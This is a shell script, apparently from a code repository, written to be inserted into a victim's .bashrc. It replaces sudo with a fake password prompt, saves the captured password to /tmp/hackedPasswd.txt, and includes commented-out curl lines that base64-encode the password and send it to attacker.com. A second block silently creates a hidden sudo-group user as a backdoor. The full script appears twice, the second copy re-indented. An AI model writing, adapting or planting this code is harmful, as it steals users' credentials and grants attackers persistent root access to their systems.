a2gs/fake_sudo.sh

## fake_sudo.sh
# https://null-byte.wonderhowto.com/how-to/steal-ubuntu-macos-sudo-passwords-without-any-cracking-0194190/
# Insert into .bashrc

function sudo () {
	# A "realsudo" variable is created. It calls the `which` command to locate
	# the path to the real sudo binary. This is used later in the function to
	# execute the target's desired command.
	realsudo="$(which sudo)"

	# The `read` command will prompt (`-p`) the target with a convincing password
	# request. The `-s` argument hides the input password, just as the real
	# sudo command would. The target password is then set in the "inputPasswd"
	# variable.
	read -s -p "[sudo] password for $USER: " inputPasswd

	# There are two `printf` commands here, separated by a semicolon.
	# The first simply prints a new line in the terminal, as the real sudo
	# does. The second writes the target's username and password to a
	# file called "hackedPasswd.txt" in the /tmp directory.
	printf "\n"; printf '%s\n' "$USER : $inputPasswd" >/tmp/hackedPasswd.txt

	# As an alternative to writing the password to the /tmp directory,
	# it can be exfiltrated to the attacker's server. Uncomment the below
	# "encoded" and "curl" lines to enable this function. The password
	# is encoded with `base64` to make it easier to transmit in the URL.
	# encoded=$(printf '%s' "$inputPasswd" | base64) >/dev/null 2>&1
	# curl -s "http://attacker.com/$USER:$encoded" >/dev/null 2>&1

	# The `-S` option allows users to input their sudo password using the command
	# line. This is used to run an arbitrary `exit` command (`-c`) as the root
	# user (`-u`) to unlock the sudo timeout function. This command and its
	# output are hidden (/dev/null) from the target. It's only here to allow
	# sudo usage for future commands.
	# For more on sudo timeouts and /dev/null, see:
	# https://itsfoss.com/change-sudo-password-timeout-ubuntu/
	# https://stackoverflow.com/questions/10508843/what-is-dev-null-21
	$realsudo -S <<< "$inputPasswd" -u root bash -c "exit" >/dev/null 2>&1

	# With the sudo timeout engaged, privileged commands can be run without
	# prompting the user for a password. This line will execute the target's
	# desired command.
	$realsudo "${@:1}"
}

##########################################
### Creating newuser (NEWUSERLOGIN / NEWPASSWORD)
sudo adduser --quiet --force-badname --gecos "" --ingroup sudo NEWUSERLOGIN 2>/dev/null 1>&2 <<EOF
NEWPASSWORD
NEWPASSWORD
EOF
	# https://null-byte.wonderhowto.com/how-to/steal-ubuntu-macos-sudo-passwords-without-any-cracking-0194190/
	# Insert into .bashrc

	function sudo () {
	# A "realsudo" variable is created. It calls the `which` command to locate
	# the path to the real sudo binary. This is used later in the function to
	# execute the target's desired command.
	realsudo="$(which sudo)"

	# The `read` command will prompt (`-p`) the target with a convincing password
	# request. The `-s` argument hides the input password, just as the real
	# sudo command would. The target password is then set in the "inputPasswd"
	# variable.
	read -s -p "[sudo] password for $USER: " inputPasswd

	# There are two `printf` commands here, separated by a semicolon.
	# The first simply prints a new line in the terminal, as the real sudo
	# does. The second writes the target's username and password to a
	# file called "hackedPasswd.txt" in the /tmp directory.
	printf "\n"; printf '%s\n' "$USER : $inputPasswd" >/tmp/hackedPasswd.txt

	# As an alternative to writing the password to the /tmp directory,
	# it can be exfiltrated to the attacker's server. Uncomment the below
	# "encoded" and "curl" lines to enable this function. The password
	# is encoded with `base64` to make it easier to transmit in the URL.
	# encoded=$(printf '%s' "$inputPasswd" \| base64) >/dev/null 2>&1
	# curl -s "http://attacker.com/$USER:$encoded" >/dev/null 2>&1

	# The `-S` option allows users to input their sudo password using the command
	# line. This is used to run an arbitrary `exit` command (`-c`) as the root
	# user (`-u`) to unlock the sudo timeout function. This command and its
	# output are hidden (/dev/null) from the target. It's only here to allow
	# sudo usage for future commands.
	# For more on sudo timeouts and /dev/null, see:
	# https://itsfoss.com/change-sudo-password-timeout-ubuntu/
	# https://stackoverflow.com/questions/10508843/what-is-dev-null-21
	$realsudo -S <<< "$inputPasswd" -u root bash -c "exit" >/dev/null 2>&1

	# With the sudo timeout engaged, privileged commands can be run without
	# prompting the user for a password. This line will execute the target's
	# desired command.
	$realsudo "${@:1}"
	}

	##########################################
	### Creating newuser (NEWUSERLOGIN / NEWPASSWORD)
	sudo adduser --quiet --force-badname --gecos "" --ingroup sudo NEWUSERLOGIN 2>/dev/null 1>&2 <<EOF
	NEWPASSWORD
	NEWPASSWORD
	EOF